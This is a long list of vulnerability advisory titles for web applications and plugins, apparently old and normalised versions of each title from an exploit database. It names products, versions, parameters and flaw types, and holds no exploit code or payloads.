CompuCMS - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Briefcase 4.0 iOS - Code Execution & File Include
Briefcase 4.0 iOS - Code Execution / File Include

Million Dollar Pixel Ads Cross-Site Scripting and SQL Injection
Million Dollar Pixel Ads Cross-Site Scripting / SQL Injection

PluXml 5.0.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Inclusion
AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion

CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection
CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection

Centreon SQL and Command Injection
Centreon - SQL Injection / Command Injection

net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Inclusion
net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion

PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting and SQL Injection
PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting / SQL Injection

BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
BLOG:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting

Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS
Modx CMS 2.2.14 - CSRF Bypass / Reflected XSS / Stored XSS

BlogEngine.NET 1.6 - Directory Traversal and Information Disclosure
BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure

TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Inclusion
TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion

Batavi 1.0 - Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities
Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities

1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection
1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection

CosmoShop 10.05.00 - Multiple Cross-Site Scripting and SQL Injection
CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection

Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting and SQL Injection
Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection

Online store php script Multiple Cross-Site Scripting and SQL Injection
Online store php script Multiple Cross-Site Scripting / SQL Injection

Ripe Website Manager 1.1 - Cross-Site Scripting and Multiple SQL Injection
Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection

Cetera eCommerce Multiple Cross-Site Scripting and SQL Injection
Cetera eCommerce Multiple Cross-Site Scripting / SQL Injection

osCSS 2.1 - Cross-Site Scripting and Multiple Local File Inclusion
osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion

CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution
CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution

Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Inclusion
Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion

PhoenixCMS 1.7 - Local File Inclusion and SQL Injection
PhoenixCMS 1.7 - Local File Inclusion / SQL Injection

4Images 1.7.9 - Multiple Remote File Inclusion and SQL Injection
4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection

Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection
Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection

Nuke Evolution Xtreme 2.0 - Local File Inclusion and SQL Injection
Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection
Tine 2.0 - 'vbook.php' Cross Site Scripting
LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting
LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting
Tine 2.0 - 'vbook.php' Cross-Site Scripting
LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting
LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross-Site Scripting
E2 Photo Gallery 0.9 - 'index.php' Cross Site Scripting
YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities
Web Auction 0.3.6 'lang' Parameter Cross Site Scripting
Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross Site Scripting
E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting
YaPIG 0.95 - Multiple Cross-Site Scripting Vulnerabilities
Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting
Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting
SelectaPix 1.4.1 - 'uploadername' Parameter Cross Site Scripting
Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting
SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting
Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting
WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting
PHP Directory Listing Script 3.1 - 'index.php' Cross Site Scripting
BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities
BMC Dashboards 7.6.01 - Cross Site Scripting / Information Disclosure
PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities
WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting
PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting
BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross-Site Scripting Vulnerabilities
BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure
PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities
encoder 0.4.10 - 'edit.php' Cross Site Scripting
Ampache 3.5.4 - 'login.php' Cross Site Scripting
encoder 0.4.10 - 'edit.php' Cross-Site Scripting
Ampache 3.5.4 - 'login.php' Cross-Site Scripting

Gelsheet 1.02 - 'index.php' Cross Site Scripting
Gelsheet 1.02 - 'index.php' Cross-Site Scripting

Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities
Perl 5.10 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities

Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities
Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities

Pandora 3.1 - Auth Bypass and Arbitrary File Upload
Pandora 3.1 - Auth Bypass / Arbitrary File Upload
Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting
poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities
Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection
Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting
poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities
Calendarix 0.8.20080808 - Multiple Cross-Site Scripting and SQL Injection

Argyle Social Multiple Cross Site Scripting Vulnerabilities
Argyle Social - Multiple Cross-Site Scripting Vulnerabilities

Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities
Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities
allocPSA 1.7.4 - 'login/login.php' Cross Site Scripting
DocMGR 1.1.2 - 'history.php' Cross Site Scripting
openQRM 4.8 - 'source_tab' Parameter Cross Site Scripting
allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting
DocMGR 1.1.2 - 'history.php' Cross-Site Scripting
openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting
eFront 3.6.9 - 'submitScore.php' Cross Site Scripting
PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities
TWiki 5.0.1 - 'origurl' Parameter Cross Site Scripting
eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting
PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities
TWiki 5.0.1 - 'origurl' Parameter Cross-Site Scripting
CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross Site Scripting
Cisco Unified Operations Manager 8.5 Common Services Device Center Cross Site Scripting
CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross-Site Scripting
Cisco Unified Operations Manager 8.5 Common Services Device Center Cross-Site Scripting

Room Juice 0.3.3 - 'display.php' Cross Site Scripting
Room Juice 0.3.3 - 'display.php' Cross-Site Scripting

LimeSurvey 1.85+ 'admin.php' Cross Site Scripting
LimeSurvey 1.85+ 'admin.php' Cross-Site Scripting

phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities
phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities
Ajax Chat 1.0 - 'ajax-chat.php' Cross Site Scripting
Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting
Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting
Gadu-Gadu Instant Messenger 6.0 File Transfer Cross-Site Scripting

Cotonti 0.9.2 Multiple SQL Injection
Cotonti 0.9.2 - Multiple SQL Injection

Kryn.cms 0.9 - '_kurl' Parameter Cross Site Scripting
Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting

Blackboard Learn 8.0 - 'keywordraw' Parameter Cross Site Scripting
Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting
Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross Site Scripting
Serendipity Freetag-plugin 3.21 - 'index.php' Cross Site Scripting
Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross-Site Scripting
Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting

ARSC Really Simple Chat 3.3-rc2 - Cross Site Scripting and Multiple SQL Injection
ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection

Nagios 3.2.3 - 'expand' Parameter Cross Site Scripting
Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting

vBulletin vBExperience 3 - 'sortorder' Parameter Cross Site Scripting
vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting
Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross Site Scripting
Multiple WordPress WooThemes - 'test.php' Cross Site Scripting
Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting
Multiple WordPress WooThemes - 'test.php' Cross-Site Scripting

Squiz Matrix 4 - 'colour_picker.php' Cross Site Scripting
Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting

BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities
BLOG:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities

The Pacer Edition CMS 2.1 - 'email' Parameter Cross Site Scripting
The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting
vBTube 1.2.9 - 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities
miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities
vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities
miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities

Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities
Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities
Immophp 1.1.1 Cross Site Scripting and SQL Injection
Taha Portal 3.2 - 'sitemap.php' Cross Site Scripting
Immophp 1.1.1 Cross-Site Scripting and SQL Injection
Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting

Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross Site Scripting
Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting

FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting
FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting

ecommerceMajor - SQL Injection And Authentication bypass
ecommerceMajor - SQL Injection / Authentication bypass

Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities
Mambo CMS 4.6.x Multiple Cross-Site Scripting Vulnerabilities

Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities
Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities

FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities
FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities

webERP 4.3.8 Multiple Script URI XSS
webERP 4.3.8 - Multiple Script URI XSS

PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities
PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities

WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities
WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities

Paliz Portal Cross Site Scripting and Multiple SQL Injection
Paliz Portal Cross-Site Scripting and Multiple SQL Injection

Classified Script c-BrowseClassified URL Cross Site Scripting
Classified Script c-BrowseClassified URL Cross-Site Scripting

Prontus CMS 'page' Parameter Cross Site Scripting
Prontus CMS 'page' Parameter Cross-Site Scripting

Alice Modem 1111 - 'rulename' Parameter Cross Site Scripting / Denial of Service
Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service
Flowplayer 3.2.7 linkUrl' Parameter Cross Site Scripting
TCExam 11.2.x Multiple Cross Site Scripting Vulnerabilities
Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting
TCExam 11.2.x Multiple Cross-Site Scripting Vulnerabilities

Joomla! 'com_resman' Component Cross Site Scripting
Joomla! 'com_resman' Component Cross-Site Scripting
Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities
Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross Site Scripting
Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities
Joomla! 1.6.5 and Prior Multiple Cross-Site Scripting Vulnerabilities
Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting
Cyberoam UTM Multiple Cross-Site Scripting Vulnerabilities

Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities
Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities

Curverider Elgg 1.7.9 Multiple Cross Site Scripting Vulnerabilities
Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities
mt LinkDatenbank 'b' Parameter Cross Site Scripting
BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting
mt LinkDatenbank 'b' Parameter Cross-Site Scripting
BESNI OKUL PORTAL 'sayfa.asp' Cross-Site Scripting
HESK 2.2 Multiple Cross Site Scripting Vulnerabilities
WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting
Community Server 2007/2008 - 'TagSelector.aspx' Cross Site Scripting
Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities
HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting
Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting
Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross-Site Scripting Vulnerabilities

u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities
u5CMS 3.9.3 - Multiple Stored XSS / Reflected XSS Vulnerabilities
Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities
Search Network 2.0 - 'query' Parameter Cross Site Scripting
OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities
Softbiz Recipes Portal Script Multiple Cross-Site Scripting Vulnerabilities
Search Network 2.0 - 'query' Parameter Cross-Site Scripting
OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities

WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities
WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities
SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities
phpWebSite 'page_id' Parameter Cross Site Scripting
awiki 20100125 Multiple Local File Inclusion
SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities
phpWebSite 'page_id' Parameter Cross-Site Scripting
awiki 20100125 - Multiple Local File Inclusion
WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting
WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross Site Scripting Vulnerabilities
WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting
WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities

PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities
PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities
Adobe ColdFusion - 'probe.cfm' Cross Site Scripting
MantisBT 1.1.8 Cross Site Scripting and SQL Injection
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting
MantisBT 1.1.8 Cross-Site Scripting and SQL Injection
OneFileCMS 1.1.1 - 'onefilecms.php' Cross Site Scripting
Pandora FMS 3.x - 'index.php' Cross Site Scripting
OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting
Pandora FMS 3.x - 'index.php' Cross-Site Scripting
Concrete 5.4.1 1 - 'rcID' Parameter Cross Site Scripting
Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities
Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting
Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities

WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS
WonderPlugin Audio Player 2.0 - Blind SQL Injection / XSS

IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities
IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities

Mambo CMS N-Skyrslur Cross Site Scripting
Mambo CMS N-Skyrslur Cross-Site Scripting

GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities
GuppY CMS 5.0.9 & 5.00.10 - Multiple CSRF Vulnerabilities

ACal 2.2.6 'calendar.php' Cross Site Scripting
ACal 2.2.6 'calendar.php' Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross Site Scripting
YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Kisanji 'gr' Parameter Cross Site Scripting
GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection
Kisanji 'gr' Parameter Cross-Site Scripting
GeoClassifieds Lite 2.0.x Multiple Cross-Site Scripting and SQL Injection
Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross Site Scripting
SkaDate 'blogs.php' Cross Site Scripting
Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting
SkaDate 'blogs.php' Cross-Site Scripting

Pluck 4.7 Multiple Local File Inclusion and File Disclosure Vulnerabilities
Pluck 4.7 - Multiple Local File Inclusion and File Disclosure Vulnerabilities

Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities
Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities

Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross Site Scripting
Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting

PunBB 1.3.5 Multiple Cross-Site Scripting Vulnerabilities
PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities
Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross Site Scripting
Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting
net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities
Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting
Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting
net4visions Multiple Products - 'dir' parameters Multiple Cross-Site Scripting Vulnerabilities

Card sharj 1.0 Multiple SQL Injection
Card sharj 1.0 - Multiple SQL Injection
i-Gallery 3.4 - 'd' Parameter Cross Site Scripting
Free Help Desk 1.1b Multiple Input Validation Vulnerabilities
phpRS 2.8.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
OneCMS 2.6.4 Multiple SQL Injection
Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities
i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting
Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities
phpRS 2.8.1 - Multiple SQL Injection / Cross-Site Scripting
OneCMS 2.6.4 - Multiple SQL Injection
Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities
AdaptCMS 2.0.1 - Cross Site Scripting / Information Disclosure
Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross Site Scripting
AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure
Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting

Adobe ColdFusion 7 - Multiple Cross Site Scripting Vulnerabilities
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities
Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities
WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross Site Scripting
WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross Site Scripting
WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross Site Scripting
WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross Site Scripting
WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross Site Scripting
WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross Site Scripting
WordPress Web Minimalist Theme 1.1 - 'index.php' Cross Site Scripting
WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross Site Scripting
WordPress Morning Coffee Theme 3.5 - 'index.php' Cross Site Scripting
WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross Site Scripting
Traq 2.2 - Multiple SQL Injection / Cross-Site Scripting
Joomla! 1.7.0 and Prior Multiple Cross-Site Scripting Vulnerabilities
Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting
WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting
WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting
WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting
WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting
WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting
WordPress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting
WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting
WordPress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting
WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting

WordPress RedLine Theme 1.65 - 's' Parameter Cross Site Scripting
WordPress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting

WordPress Trending 0.1 - 'cpage' Parameter Cross Site Scripting
WordPress Trending 0.1 - 'cpage' Parameter Cross-Site Scripting
Innovate Portal 2.0 - 'cat' Parameter Cross Site Scripting
Active CMS 1.2 - 'mod' Parameter Cross Site Scripting
Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting
Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting

Jaws 0.8.14 Multiple Remote File Inclusion
Jaws 0.8.14 - Multiple Remote File Inclusion

6KBBS 8.0 build 20101201 - Cross Site Scripting / Information Disclosure
6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure

SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities
SilverStripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities
BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities

WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities
WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities
PROMOTIC 8.1.3 Multiple Security Vulnerabilities
Xenon 'id' Parameter Multiple SQL Injection
asgbookphp 1.9 - 'index.php' Cross Site Scripting
PROMOTIC 8.1.3 - Multiple Security Vulnerabilities
Xenon - 'id' Parameter Multiple SQL Injection
asgbookphp 1.9 - 'index.php' Cross-Site Scripting
Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities
Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection
Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities
Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection

WordPress Theme Photocrati 4.x.x - SQL Injection & XSS
WordPress Theme Photocrati 4.x.x - SQL Injection / XSS

Splunk 4.1.6 'segment' Parameter Cross Site Scripting
Splunk 4.1.6 'segment' Parameter Cross-Site Scripting
osCommerce - Remote File Upload and File Disclosure
Tine 2.0 Multiple Cross Site Scripting Vulnerabilities
osCommerce - Remote File Upload / File Disclosure
Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities
InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities
Alsbtain Bulletin 1.5/1.6 Multiple Local File Inclusion
vtiger CRM 5.2.1 - 'index.php' Multiple Cross Site Scripting Vulnerabilities
InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities
Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion
vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities
XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities

Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross Site Scripting
Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting
Domain Shop 'index.php' Cross Site Scripting
vBulletin 4.1.7 Multiple Remote File Inclusion
Domain Shop 'index.php' Cross-Site Scripting
vBulletin 4.1.7 - Multiple Remote File Inclusion

Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities
Hyperic HQ Enterprise 4.5.1 Cross-Site Scripting and Multiple Unspecified Security Vulnerabilities
IBSng B1.34(T96) 'str' Parameter Cross Site Scripting
eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities
eFront 3.6.x Multiple Cross Site Scripting and SQL Injection
Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting
IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting
eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities
eFront 3.6.x Multiple Cross-Site Scripting and SQL Injection
Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting

CmyDocument Multiple Cross Site Scripting Vulnerabilities
CmyDocument Multiple Cross-Site Scripting Vulnerabilities

WordPress Bonus Theme 1.0 - 's' Parameter Cross Site Scripting
WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting

SmartJobBoard 'keywords' Parameter Cross Site Scripting
SmartJobBoard 'keywords' Parameter Cross-Site Scripting

XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities
XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities
AShop - Open-Redirection / Cross Site Scripting
Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities
Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities
AShop - Open-Redirection / Cross-Site Scripting
Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities
Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross-Site Scripting Vulnerabilities

PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection
PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting
WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross-Site Scripting
WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting

GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities
GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities
WordPress Alert Before Your Post Plugin - 'name' Parameter Cross Site Scripting
WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross Site Scripting
WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross Site Scripting
WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross Site Scripting
WordPress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting
WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting
WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting
WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting
WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting
WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross Site Scripting
WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross Site Scripting
WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting
WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting
